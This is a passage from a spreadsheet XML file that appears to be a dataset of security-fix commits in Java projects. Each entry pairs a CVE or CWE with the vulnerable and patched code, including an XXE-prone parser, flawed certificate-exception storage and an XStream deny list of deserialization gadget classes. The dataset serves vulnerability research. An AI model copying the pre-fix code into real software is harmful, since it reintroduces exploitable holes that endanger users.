    private static File createTemporaryFolderWithNioApi(File parentFolder) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
        Class&lt;?&gt; filesClass = Class.forName("java.nio.file.Files");
        Object fileAttributeArray = Array.newInstance(Class.forName("java.nio.file.attribute.FileAttribute"), 0);
        Class&lt;?&gt; pathClass = Class.forName("java.nio.file.Path");
        Object tempDir;
        if (parentFolder != null) {
            Method createTempDirectoryMethod = filesClass.getDeclaredMethod("createTempDirectory", pathClass, String.class, fileAttributeArray.getClass());
            Object parentPath = File.class.getDeclaredMethod("toPath").invoke(parentFolder);
            tempDir = createTempDirectoryMethod.invoke(null, parentPath, TMP_PREFIX, fileAttributeArray);
        } else {
            Method createTempDirectoryMethod = filesClass.getDeclaredMethod("createTempDirectory", String.class, fileAttributeArray.getClass());
            tempDir = createTempDirectoryMethod.invoke(null, TMP_PREFIX, fileAttributeArray);
        }
        return (File) pathClass.getDeclaredMethod("toFile").invoke(tempDir);
    }
    private static File createTemporaryFolderWithFileApi(File parentFolder) throws IOException {
</t>
  </si>
  <si>
    <t>Merge pull request from GHSA-269g-pwp5-87ppWhen running on Java 7 or later, temporary directories are now created
Using Java’s NIO API which restricts permissions to owner-only by
default.</t>
  </si>
  <si>
    <t>CVE-2020-1732</t>
  </si>
  <si>
    <t>https://github.com/wildfly-security/soteria/commit/c2479f8c39d7d661341fdcaff7f5e97c5eea1a54</t>
  </si>
  <si>
    <t>DefaultAuthConfigProvider.java</t>
  </si>
  <si>
    <t>c2479f8c39d7d661341fdcaff7f5e97c5eea1a54</t>
  </si>
  <si>
    <t xml:space="preserve"> * 
    private ServerAuthModule serverAuthModule;
    public DefaultAuthConfigProvider(ServerAuthModule serverAuthModule) {
        this.serverAuthModule = serverAuthModule;
     * 
            providerProperties, serverAuthModule);
     * 
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.function.Supplier;
 *
    private Supplier&lt;ServerAuthModule&gt; serverAuthModuleSupplier;
    public DefaultAuthConfigProvider(Supplier&lt;ServerAuthModule&gt; serverAuthModuleSupplier) {
        this.serverAuthModuleSupplier = serverAuthModuleSupplier;
     *
            providerProperties, serverAuthModuleSupplier);
     *
</t>
  </si>
  <si>
    <t>Merge pull request #1 from darranl/CVE-2020-1732[CVE-2020-1732] Adjust JASPIC integration to create a new ServerAuthModule for each request.</t>
  </si>
  <si>
    <t>DefaultServerAuthConfig.java</t>
  </si>
  <si>
    <t xml:space="preserve"> * 
    private ServerAuthModule serverAuthModule;
        Map&lt;String, String&gt; providerProperties, ServerAuthModule serverAuthModule) {
        this.serverAuthModule = serverAuthModule;
        return new DefaultServerAuthContext(handler, serverAuthModule);
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.function.Supplier;
 *
    private Supplier&lt;ServerAuthModule&gt; serverAuthModuleSupplier;
        Map&lt;String, String&gt; providerProperties, Supplier&lt;ServerAuthModule&gt; serverAuthModuleSupplier) {
        this.serverAuthModuleSupplier = serverAuthModuleSupplier;
        return new DefaultServerAuthContext(handler, serverAuthModuleSupplier);
</t>
  </si>
  <si>
    <t>DefaultServerAuthContext.java</t>
  </si>
  <si>
    <t xml:space="preserve"> * 
    public DefaultServerAuthContext(CallbackHandler handler, ServerAuthModule serverAuthModule) throws AuthException {
        this.serverAuthModule = serverAuthModule;
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.function.Supplier;
 *
    public DefaultServerAuthContext(CallbackHandler handler, Supplier&lt;ServerAuthModule&gt; serverAuthModuleSupplier) throws AuthException {
        this.serverAuthModule = serverAuthModuleSupplier.get();
</t>
  </si>
  <si>
    <t>Jaspic.java</t>
  </si>
  <si>
    <t xml:space="preserve"> * 
	 * 
	 * 
	 * 
	 * 
	 * 
	 * 
	 * @param serverAuthModule the server auth module to be registered
	public static String registerServerAuthModule(ServerAuthModule serverAuthModule, ServletContext servletContext) {
	                    new DefaultAuthConfigProvider(serverAuthModule),
	                    "HttpServlet", 
	                    getAppContextID(servletContext), 
	 * 
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.function.Supplier;
import org.glassfish.soteria.cdi.spi.CDIPerRequestInitializer;
 *
	 *
	 *
	 *
	 *
	 *
	 *
	 * @param cdiPerRequestInitializer A {@link CDIPerRequestInitializer} to pass to the {@link ServerAuthModule}
	public static String registerServerAuthModule(CDIPerRequestInitializer cdiPerRequestInitializer, ServletContext servletContext) {
	                    new DefaultAuthConfigProvider(() -&gt; new HttpBridgeServerAuthModule(cdiPerRequestInitializer)),
	                    "HttpServlet",
	                    getAppContextID(servletContext),
	 *
</t>
  </si>
  <si>
    <t>CVE-2020-19005</t>
  </si>
  <si>
    <t>https://github.com/94fzb/zrlog/commit/b2b4415e2e59b6f18b0a62b633e71c96d63c43ba</t>
  </si>
  <si>
    <t>PluginHelper.java</t>
  </si>
  <si>
    <t>b2b4415e2e59b6f18b0a62b633e71c96d63c43ba</t>
  </si>
  <si>
    <t xml:space="preserve">package com.zrlog.service;
import com.jfinal.core.JFinal;
import com.zrlog.model.User;
    public static Map&lt;String, String&gt; genHeaderMapByRequest(HttpServletRequest request) {
        AdminTokenVO adminTokenVO = AdminTokenThreadLocal.getUser();
            User user = User.dao.findById(adminTokenVO.getUserId());
            map.put("LoginUserName", user.get("userName").toString());
        map.put("Blog-Version", ((Map) JFinal.me().getServletContext().getAttribute("zrlog")).get("version").toString());
</t>
  </si>
  <si>
    <t xml:space="preserve">package com.zrlog.web.util;
import com.zrlog.util.BlogBuildInfoUtil;
    public static Map&lt;String, String&gt; genHeaderMapByRequest(HttpServletRequest request, AdminTokenVO adminTokenVO) {
        map.put("Blog-Version", BlogBuildInfoUtil.getVersion());
</t>
  </si>
  <si>
    <t>Fix #48 forget remove token from ThreadLocal</t>
  </si>
  <si>
    <t>UploadService.java</t>
  </si>
  <si>
    <t xml:space="preserve">                    , new HttpJsonArrayHandle&lt;Map&gt;(), PluginHelper.genHeaderMapByRequest(request)).getT();
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.zrlog.web.util.PluginHelper;
                    , new HttpJsonArrayHandle&lt;Map&gt;(), PluginHelper.genHeaderMapByRequest(request, AdminTokenThreadLocal.getUser())).getT();
</t>
  </si>
  <si>
    <t>PluginHandler.java</t>
  </si>
  <si>
    <t xml:space="preserve">import com.zrlog.service.PluginHelper;
                Map.Entry&lt;AdminTokenVO, User&gt; entry = adminTokenService.getAdminTokenVOUserEntry(request);
            httpResponse = httpUtil.sendGetRequest(pluginServerHttp + uri, request.getParameterMap(), handle, PluginHelper.genHeaderMapByRequest(request)).getT();
                httpResponse = httpUtil.sendPostRequest(pluginServerHttp + uri, request.getParameterMap(), handle, PluginHelper.genHeaderMapByRequest(request)).getT();
                httpResponse = httpUtil.sendPostRequest(pluginServerHttp + uri + "?" + request.getQueryString(), IOUtil.getByteByInputStream(request.getInputStream()), handle, PluginHelper.genHeaderMapByRequest(request)).getT();
</t>
  </si>
  <si>
    <t xml:space="preserve">import com.zrlog.web.util.PluginHelper;
            Map.Entry&lt;AdminTokenVO, User&gt; entry = null;
                entry = adminTokenService.getAdminTokenVOUserEntry(request);
                if (entry != null) {
                    AdminTokenThreadLocal.remove();
                }
            httpResponse = httpUtil.sendGetRequest(pluginServerHttp + uri, request.getParameterMap(), handle, PluginHelper.genHeaderMapByRequest(request, AdminTokenThreadLocal.getUser())).getT();
                httpResponse = httpUtil.sendPostRequest(pluginServerHttp + uri, request.getParameterMap(), handle, PluginHelper.genHeaderMapByRequest(request, AdminTokenThreadLocal.getUser())).getT();
                httpResponse = httpUtil.sendPostRequest(pluginServerHttp + uri + "?" + request.getQueryString(), IOUtil.getByteByInputStream(request.getInputStream()), handle, PluginHelper.genHeaderMapByRequest(request, AdminTokenThreadLocal.getUser())).getT();
</t>
  </si>
  <si>
    <t>CVE-2020-25020</t>
  </si>
  <si>
    <t>https://github.com/joniles/mpxj/commit/c3e457f7a16facfe563eade82b0fa8736a8c96f9</t>
  </si>
  <si>
    <t>UnmarshalHelper.java</t>
  </si>
  <si>
    <t>c3e457f7a16facfe563eade82b0fa8736a8c96f9</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * file:       UnmarshalHelper.java
 * author:     Jon Iles
 * copyright:  (c) Packwood Software 2020
 * date:       29/08/2020
 */
/*
 * This library is free software; you can redistribute it and/or modify it
 * under the terms of the GNU Lesser General Public License as published by the
 * Free Software Foundation; either version 2.1 of the License, or (at your
 * option) any later version.
 *
 * This library is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
 * or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
 * License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public License
 * along with this library; if not, write to the Free Software Foundation, Inc.,
 * 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
 */
package net.sf.mpxj.common;
import java.io.IOException;
import java.io.InputStream;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.JAXBException;
import javax.xml.bind.Unmarshaller;
import javax.xml.bind.UnmarshallerHandler;
import javax.xml.bind.ValidationEvent;
import javax.xml.bind.ValidationEventHandler;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.sax.SAXSource;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLFilter;
/**
 * Utility methods wrapping JAXB unmarshal.
 */
public final class UnmarshalHelper
{
   /**
    * Unmarshal from an input stream.
    *
    * @param context JAXB context
    * @param stream input stream
    * @return Unmarshalled root node
    */
   public static final Object unmarshal(JAXBContext context, InputStream stream) throws JAXBException, SAXException, ParserConfigurationException
   {
      return context.createUnmarshaller().unmarshal(new SAXSource(XmlReaderHelper.createXmlReader(), new InputSource(stream)));
   }
   /**
    * Unmarshall from an input stream and apply a filter.
    *
    * @param context JAXB context
    * @param stream input stream
    * @param filter XMLFilter instance
    * @return Unmarshalled root node
    */
   public static final Object unmarshal(JAXBContext context, InputStream stream, XMLFilter filter) throws JAXBException, SAXException, ParserConfigurationException, IOException
   {
      return unmarshal(context, new InputSource(stream), filter, false);
   }
   /**
    * Unmarshall from an input source and apply a filter, optionally ignore validation errors.
    *
    * @param context JAXB context
    * @param source input source
    * @param filter XMLFilter instance
    * @param ignoreValidationErrors true if validation errors are ignored
    * @return Unmarshalled root node
    */
   public static final Object unmarshal(JAXBContext context, InputSource source, XMLFilter filter, boolean ignoreValidationErrors) throws JAXBException, SAXException, ParserConfigurationException, IOException
   {
      Unmarshaller unmarshaller = context.createUnmarshaller();
      if (ignoreValidationErrors)
      {
         unmarshaller.setEventHandler(new ValidationEventHandler()
         {
            @Override public boolean handleEvent(ValidationEvent event)
            {
               return true;
            }
         });
      }
      UnmarshallerHandler unmarshallerHandler = unmarshaller.getUnmarshallerHandler();
      filter.setParent(XmlReaderHelper.createXmlReader());
      filter.setContentHandler(unmarshallerHandler);
      filter.parse(source);
      return unmarshallerHandler.getResult();
   }
}
</t>
  </si>
  <si>
    <t>XXE fix</t>
  </si>
  <si>
    <t>XmlReaderHelper.java</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * file:       XmlReaderHelper.java
 * author:     Jon Iles
 * copyright:  (c) Packwood Software 2020
 * date:       29/08/2020
 */
/*
 * This library is free software; you can redistribute it and/or modify it
 * under the terms of the GNU Lesser General Public License as published by the
 * Free Software Foundation; either version 2.1 of the License, or (at your
 * option) any later version.
 *
 * This library is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
 * or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
 * License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public License
 * along with this library; if not, write to the Free Software Foundation, Inc.,
 * 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
 */
package net.sf.mpxj.common;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
/**
 * Utility methods for working with XmlReader.
 */
public final class XmlReaderHelper
{
   /**
    * Create a new XmlReader instance.
    *
    * @return XmlReader instance
    */
   public static final XMLReader createXmlReader() throws SAXException, ParserConfigurationException
   {
      SAXParserFactory factory = SAXParserFactory.newInstance();
      factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
      factory.setNamespaceAware(true);
      SAXParser saxParser = factory.newSAXParser();
      return saxParser.getXMLReader();
   }
}
</t>
  </si>
  <si>
    <t>ConceptDrawProjectReader.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.InputStreamReader;
import javax.xml.bind.Unmarshaller;
import javax.xml.bind.UnmarshallerHandler;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.XMLFilter;
import org.xml.sax.XMLReader;
         SAXParserFactory factory = SAXParserFactory.newInstance();
         SAXParser saxParser = factory.newSAXParser();
         XMLReader xmlReader = saxParser.getXMLReader();
         if (CONTEXT == null)
         {
            throw CONTEXT_EXCEPTION;
         }
         Unmarshaller unmarshaller = CONTEXT.createUnmarshaller();
         XMLFilter filter = new NamespaceFilter();
         filter.setParent(xmlReader);
         UnmarshallerHandler unmarshallerHandler = unmarshaller.getUnmarshallerHandler();
         filter.setContentHandler(unmarshallerHandler);
         filter.parse(new InputSource(new InputStreamReader(stream)));
         Document cdp = (Document) unmarshallerHandler.getResult();
</t>
  </si>
  <si>
    <t xml:space="preserve">import net.sf.mpxj.common.UnmarshalHelper;
         if (CONTEXT == null)
         {
            throw CONTEXT_EXCEPTION;
         }
         Document cdp = (Document) UnmarshalHelper.unmarshal(CONTEXT, stream, new NamespaceFilter());
</t>
  </si>
  <si>
    <t>GanttDesignerReader.java</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.xml.bind.Unmarshaller;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.sax.SAXSource;
import org.xml.sax.InputSource;
import org.xml.sax.XMLReader;
         SAXParserFactory factory = SAXParserFactory.newInstance();
         SAXParser saxParser = factory.newSAXParser();
         XMLReader xmlReader = saxParser.getXMLReader();
         SAXSource doc = new SAXSource(xmlReader, new InputSource(stream));
         if (CONTEXT == null)
         {
            throw CONTEXT_EXCEPTION;
         }
         Unmarshaller unmarshaller = CONTEXT.createUnmarshaller();
         Gantt gantt = (Gantt) unmarshaller.unmarshal(doc);
</t>
  </si>
  <si>
    <t xml:space="preserve">import net.sf.mpxj.common.UnmarshalHelper;
         if (CONTEXT == null)
         {
            throw CONTEXT_EXCEPTION;
         }
         Gantt gantt = (Gantt) UnmarshalHelper.unmarshal(CONTEXT, stream);
</t>
  </si>
  <si>
    <t>GanttProjectReader.java</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.xml.bind.Unmarshaller;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.sax.SAXSource;
import org.xml.sax.InputSource;
import org.xml.sax.XMLReader;
         SAXParserFactory factory = SAXParserFactory.newInstance();
         SAXParser saxParser = factory.newSAXParser();
         XMLReader xmlReader = saxParser.getXMLReader();
         SAXSource doc = new SAXSource(xmlReader, new InputSource(stream));
         if (CONTEXT == null)
         {
            throw CONTEXT_EXCEPTION;
         }
         Unmarshaller unmarshaller = CONTEXT.createUnmarshaller();
         Project ganttProject = (Project) unmarshaller.unmarshal(doc);
</t>
  </si>
  <si>
    <t xml:space="preserve">import net.sf.mpxj.common.UnmarshalHelper;
         if (CONTEXT == null)
         {
            throw CONTEXT_EXCEPTION;
         }
         Project ganttProject = (Project) UnmarshalHelper.unmarshal(CONTEXT, stream);
</t>
  </si>
  <si>
    <t>CVE-2020-25021</t>
  </si>
  <si>
    <t>https://github.com/rweather/noise-java/commit/18e86b6f8bea7326934109aa9ffa705ebf4bde90</t>
  </si>
  <si>
    <t>AESGCMFallbackCipherState.java</t>
  </si>
  <si>
    <t>18e86b6f8bea7326934109aa9ffa705ebf4bde90</t>
  </si>
  <si>
    <t xml:space="preserve">		if (ciphertextOffset &gt; ciphertext.length)
			space = 0;
		else
			space = ciphertext.length - ciphertextOffset;
		if (ciphertextOffset &gt; ciphertext.length)
			space = 0;
		if (plaintextOffset &gt; plaintext.length)
			space = 0;
		else
			space = plaintext.length - plaintextOffset;
</t>
  </si>
  <si>
    <t xml:space="preserve">		if (ciphertextOffset &lt; 0 || ciphertextOffset &gt; ciphertext.length)
			throw new IllegalArgumentException();
		if (length &lt; 0 || plaintextOffset &lt; 0 || plaintextOffset &gt; plaintext.length)
			throw new IllegalArgumentException();
		space = ciphertext.length - ciphertextOffset;
		if (ciphertextOffset &lt; 0 || ciphertextOffset &gt; ciphertext.length)
			throw new IllegalArgumentException();
		if (length &lt; 0 || plaintextOffset &lt; 0 || plaintextOffset &gt; plaintext.length)
			throw new IllegalArgumentException();
		space = plaintext.length - plaintextOffset;
</t>
  </si>
  <si>
    <t>Improve array bounds checks in CipherState implementationsThanks to Pietro Oliva for identifying these issues.</t>
  </si>
  <si>
    <t>AESGCMOnCtrCipherState.java</t>
  </si>
  <si>
    <t>ChaChaPolyCipherState.java</t>
  </si>
  <si>
    <t>CipherState.java</t>
  </si>
  <si>
    <t xml:space="preserve">	 * @throws IllegalArgumentException One of the parameters is out of range.
	 *
	 * @throws IllegalArgumentException One of the parameters is out of range.
	 *
</t>
  </si>
  <si>
    <t>CWE-918</t>
  </si>
  <si>
    <t>CVE-2020-25820</t>
  </si>
  <si>
    <t>https://github.com/bigbluebutton/bigbluebutton/commit/71fe1eac1e5bd73a2cd44bd79c001086b250e435</t>
  </si>
  <si>
    <t>OfficeToPdfConversionService.java</t>
  </si>
  <si>
    <t>71fe1eac1e5bd73a2cd44bd79c001086b250e435</t>
  </si>
  <si>
    <t xml:space="preserve">import com.sun.star.document.UpdateDocMode;
    final Map&lt;String, Object&gt; loadProperties = new HashMap&lt;&gt;();
    loadProperties.put("Hidden", true);
    loadProperties.put("ReadOnly", true);
    loadProperties.put("UpdateDocMode", UpdateDocMode.NO_UPDATE);
      .loadProperties(loadProperties)
</t>
  </si>
  <si>
    <t>Merge pull request #10619 from bigbluebutton/bbb-soffice-disable-updateDisable libreoffice document update ( speed up the conversion )</t>
  </si>
  <si>
    <t>Server-Side Request Forgery (SSRF)</t>
  </si>
  <si>
    <t>The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.</t>
  </si>
  <si>
    <t>By providing URLs to unexpected hosts or ports, attackers can make it appear that the server is sending the request, possibly bypassing access controls such as firewalls that prevent the attackers from accessing the URLs directly. The server can be used as a proxy to conduct port scanning of hosts in internal networks, use other URLs such as that can access documents on the system (using file://), or use other protocols such as gopher:// or tftp://, which may provide greater control over the contents of requests.</t>
  </si>
  <si>
    <t>CWE-295</t>
  </si>
  <si>
    <t>CVE-2020-26117</t>
  </si>
  <si>
    <t>https://github.com/TigerVNC/tigervnc/commit/20dea801e747318525a5859fe4f37c52b05310cb</t>
  </si>
  <si>
    <t>CSecurityTLS.java</t>
  </si>
  <si>
    <t>20dea801e747318525a5859fe4f37c52b05310cb</t>
  </si>
  <si>
    <t xml:space="preserve">// FIXME:
// Need to shutdown the connection cleanly
// FIXME?
// add a finalizer method that calls shutdown
      String thumbprint = getThumbprint(cert);
      File certFile = new File(vncDir, "x509_savedcerts.pem");
      CertificateFactory cf = CertificateFactory.getInstance("X.509");
      if (vncDir.exists() &amp;&amp; certFile.exists() &amp;&amp; certFile.canRead()) {
        InputStream certStream = new MyFileInputStream(certFile);
        certs = cf.generateCertificates(certStream);
        for (Certificate c : certs)
          if (thumbprint.equals(getThumbprint((X509Certificate)c)))
            return;
      }
        verifyHostname(cert);
          String certinfo =
            "  Subject: "+cert.getSubjectX500Principal().getName()+"\n"+
            "  Issuer: "+cert.getIssuerX500Principal().getName()+"\n"+
            "  Serial Number: "+cert.getSerialNumber()+"\n"+
            "  Version: "+cert.getVersion()+"\n"+
            "  Signature Algorithm: "+cert.getPublicKey().getAlgorithm()+"\n"+
            "  Not Valid Before: "+cert.getNotBefore()+"\n"+
            "  Not Valid After: "+cert.getNotAfter()+"\n"+
            "  SHA1 Fingerprint: "+getThumbprint(cert)+"\n"+
            "\n"+
            "Do you want to save it and continue?";
          if (!msg.showMsgBox(YES_NO_OPTION, "certificate issuer unknown",
                certinfo)) {
            throw new AuthFailureException("certificate issuer unknown");
          }
          if (certs == null || !certs.contains(cert)) {
            byte[] der = cert.getEncoded();
            String pem = Base64.getEncoder().encodeToString(der);
            pem = pem.replaceAll("(.{64})", "$1\n");
            FileWriter fw = null;
            try {
              if (!vncDir.exists())
                vncDir.mkdir();
              if (!certFile.exists() &amp;&amp; !certFile.createNewFile()) {
                vlog.error("Certificate save failed.");
              } else {
                fw = new FileWriter(certFile.getAbsolutePath(), true);
                fw.write("-----BEGIN CERTIFICATE-----\n");
                fw.write(pem+"\n");
                fw.write("-----END CERTIFICATE-----\n");
              }
            } catch (IOException ioe) {
              msg.showMsgBox(OK_OPTION, "certificate save failed",
                             "Could not save the certificate");
            } finally {
              try {
                if (fw != null)
                  fw.close();
              } catch(IOException ioe2) {
                throw new Exception(ioe2.getMessage());
              }
            }
          }
          "Hostname verification failed. Do you want to continue?",
          "Hostname Verification Failure",
          throw new WarningException("Hostname verification failed.");
</t>
  </si>
  <si>
    <t xml:space="preserve">      String pk =
        Base64.getEncoder().encodeToString(cert.getPublicKey().getEncoded());
        verifyHostname(cert);
      } catch(CertificateParsingException e) {
        throw new SystemException(e.getMessage());
      if (!vncDir.exists())
        throw new AuthFailureException("Could not obtain VNC home directory "+
                                       "path for known hosts storage");
      File dbPath = new File(vncDir, "x509_known_hosts");
      String info =
        "  Subject: "+cert.getSubjectX500Principal().getName()+"\n"+
        "  Issuer: "+cert.getIssuerX500Principal().getName()+"\n"+
        "  Serial Number: "+cert.getSerialNumber()+"\n"+
        "  Version: "+cert.getVersion()+"\n"+
        "  Signature Algorithm: "+cert.getPublicKey().getAlgorithm()+"\n"+
        "  Not Valid Before: "+cert.getNotBefore()+"\n"+
        "  Not Valid After: "+cert.getNotAfter()+"\n"+
        "  SHA-1 Fingerprint: "+getThumbprint(cert)+"\n";
        if (dbPath.exists()) {
          FileReader db = new FileReader(dbPath);
          BufferedReader dbBuf = new BufferedReader(db);
          String line;
          String server = client.getServerName().toLowerCase();
          while ((line = dbBuf.readLine())!=null) {
            String fields[] = line.split("\\|");
            if (fields.length==6) {
              if (server.equals(fields[2]) &amp;&amp; pk.equals(fields[5])) {
                vlog.debug("Server certificate found in known hosts file");
                dbBuf.close();
                return;
              } else if (server.equals(fields[2]) &amp;&amp; !pk.equals(fields[5]) ||
                         !server.equals(fields[2]) &amp;&amp; pk.equals(fields[5])) {
                throw new CertStoreException();
              }
            }
          }
          dbBuf.close();
        }
      } catch (IOException e) {
        throw new AuthFailureException("Could not load known hosts database");
      } catch (CertStoreException e) {
        vlog.debug("Server host key mismatch");
        vlog.debug(info);
        String text =
          "This host is previously known with a different "+
          "certificate, and the new certificate has been "+
          "signed by an unknown authority\n"+
          "\n"+info+"\n"+
          "Someone could be trying to impersonate the site and you should not continue.\n"+
          "\n"+
          "Do you want to make an exception for this server?";
        if (!msg.showMsgBox(YES_NO_OPTION, "Unexpected certificate issuer", text))
          throw new AuthFailureException("Unexpected certificate issuer");
        store_pubkey(dbPath, client.getServerName().toLowerCase(), pk);
          vlog.debug("Server host not previously known");
          vlog.debug(info);
          String text =
            "\n"+info+"\n"+
            "Someone could be trying to impersonate the site and you should not continue.\n"+
            "Do you want to make an exception for this server?";
          if (!msg.showMsgBox(YES_NO_OPTION, "Unknown certificate issuer", text))
            throw new AuthFailureException("Unknown certificate issuer");
          store_pubkey(dbPath, client.getServerName().toLowerCase(), pk);
    private void store_pubkey(File dbPath, String serverName, String pk)
    {
      ArrayList&lt;String&gt; lines = new ArrayList&lt;String&gt;();
      File vncDir = new File(FileUtils.getVncHomeDir());
      try {
        if (dbPath.exists()) {
          FileReader db = new FileReader(dbPath);
          BufferedReader dbBuf = new BufferedReader(db);
          String line;
          while ((line = dbBuf.readLine())!=null) {
            String fields[] = line.split("\\|");
            if (fields.length==6)
              if (!serverName.equals(fields[2]) &amp;&amp; !pk.equals(fields[5]))
                lines.add(line);
          }
          dbBuf.close();
        }
      } catch (IOException e) {
        throw new AuthFailureException("Could not load known hosts database");
      }
      try {
        if (!dbPath.exists())
          dbPath.createNewFile();
        FileWriter fw = new FileWriter(dbPath.getAbsolutePath(), false);
        Iterator i = lines.iterator();
        while (i.hasNext())
          fw.write((String)i.next()+"\n");
        fw.write("|g0|"+serverName+"|*|0|"+pk+"\n");
        fw.close();
      } catch (IOException e) {
        vlog.error("Failed to store server certificate to known hosts database");
      }
    }
          "Hostname ("+client.getServerName()+") does not match the"+
          " server certificate, do you want to continue?",
          "Certificate hostname mismatch",
          throw new WarningException("Certificate hostname mismatch.");
</t>
  </si>
  <si>
    <t>Properly store certificate exceptions in Java viewerLike the native viewer, the Java viewer didn't store certificate
exceptions properly. Whilst not as bad as the native viewer, it still
failed to check that a stored certificate wouldn't be maliciously used
for another server. In practice this can in most cases be used to
impersonate another server.
Handle this like the native viewer by storing exceptions for a specific
hostname/certificate combination.
(cherry picked from commit f029745)</t>
  </si>
  <si>
    <t>Improper Certificate Validation</t>
  </si>
  <si>
    <t>The software does not validate, or incorrectly validates, a certificate.</t>
  </si>
  <si>
    <t>When a certificate is invalid or malicious, it might allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. The software might connect to a malicious host while believing it is a trusted host, or the software might be deceived into accepting spoofed data that appears to originate from a trusted host.</t>
  </si>
  <si>
    <t>https://github.com/TigerVNC/tigervnc/commit/f029745f63ac7d22fb91639b2cb5b3ab56134d6e</t>
  </si>
  <si>
    <t>f029745f63ac7d22fb91639b2cb5b3ab56134d6e</t>
  </si>
  <si>
    <t>Properly store certificate exceptions in Java viewerLike the native viewer, the Java viewer didn't store certificate
exceptions properly. Whilst not as bad as the native viewer, it still
failed to check that a stored certificate wouldn't be maliciously used
for another server. In practice this can in most cases be used to
impersonate another server.
Handle this like the native viewer by storing exceptions for a specific
hostname/certificate combination.</t>
  </si>
  <si>
    <t>CVE-2020-26217</t>
  </si>
  <si>
    <t>https://github.com/x-stream/xstream/commit/0fec095d534126931c99fd38e9c6d41f5c685c1a</t>
  </si>
  <si>
    <t>XStream.java</t>
  </si>
  <si>
    <t>0fec095d534126931c99fd38e9c6d41f5c685c1a</t>
  </si>
  <si>
    <t xml:space="preserve">        denyTypes(new String[]{"java.beans.EventHandler"});
</t>
  </si>
  <si>
    <t xml:space="preserve">        denyTypes(new String[]{"java.beans.EventHandler", "javax.imageio.ImageIO$ContainsFilter"});
</t>
  </si>
  <si>
    <t>Fix for CVE-2017-9805.</t>
  </si>
  <si>
    <t>CVE-2020-26230</t>
  </si>
  <si>
    <t>https://github.com/RadarCOVID/radar-covid-backend-dp3t-server/commit/6d30c92cc8fcbde3ded7e9518853ef278080344d</t>
  </si>
  <si>
    <t>GaenController.java</t>
  </si>
  <si>
    <t>6d30c92cc8fcbde3ded7e9518853ef278080344d</t>
  </si>
  <si>
    <t xml:space="preserve">	@ResponseRetention(time = "application.response.retention.time.exposednextday")
</t>
  </si>
  <si>
    <t>[MAPR] AOP aspects ordering</t>
  </si>
  <si>
    <t>ControllerLoggerAspectConfiguration.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.springframework.core.annotation.Order;
    @Order(1)
</t>
  </si>
  <si>
    <t>MethodLoggerAspectConfiguration.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.springframework.core.annotation.Order;
    @Order(2)
</t>
  </si>
  <si>
    <t>ResponseRetentionAspectConfiguration.java</t>
  </si>
  <si>
    <t xml:space="preserve">import org.springframework.core.annotation.Order;
    @Order(0)
</t>
  </si>
  <si>
    <t>https://github.com/RadarCOVID/radar-covid-backend-dp3t-server/commit/c37f81636250892670750e3989139fd76d4beffe</t>
  </si>
  <si>
    <t>c37f81636250892670750e3989139fd76d4beffe</t>
  </si>
  <si>
    <t xml:space="preserve">import org.dpppt.backend.sdk.ws.radarcovid.annotation.ResponseRetention;
	@ResponseRetention(time = "application.response.retention.time.exposed")
</t>
  </si>
  <si>
    <t>[MAPR] Setted responses retention time on fake requests</t>
  </si>
  <si>
    <t>ResponseRetention.java</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * Copyright (c) 2020 Gobierno de España
 *
 * This Source Code Form is subject to the terms of the Mozilla Public
 * License, v. 2.0. If a copy of the MPL was not distributed with this
 * file, You can obtain one at http://mozilla.org/MPL/2.0/.
 *
 * SPDX-License-Identifier: MPL-2.0
 */
package org.dpppt.backend.sdk.ws.radarcovid.annotation;
import java.lang.annotation.Documented;
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
@Documented
@Retention(value=RetentionPolicy.RUNTIME)
@Target(value={ElementType.CONSTRUCTOR, ElementType.METHOD})
public @interface ResponseRetention {
	/**
	 * Environment property with response retention time, in milliseconds
	 */
	String time();
}
</t>
  </si>
  <si>
    <t xml:space="preserve">/*
 * Copyright (c) 2020 Gobierno de España
 *
 * This Source Code Form is subject to the terms of the Mozilla Public
 * License, v. 2.0. If a copy of the MPL was not distributed with this
 * file, You can obtain one at http://mozilla.org/MPL/2.0/.
 *
 * SPDX-License-Identifier: MPL-2.0
 */
package org.dpppt.backend.sdk.ws.radarcovid.config;
import java.util.Arrays;
import org.apache.commons.lang3.math.NumberUtils;
import org.aspectj.lang.ProceedingJoinPoint;
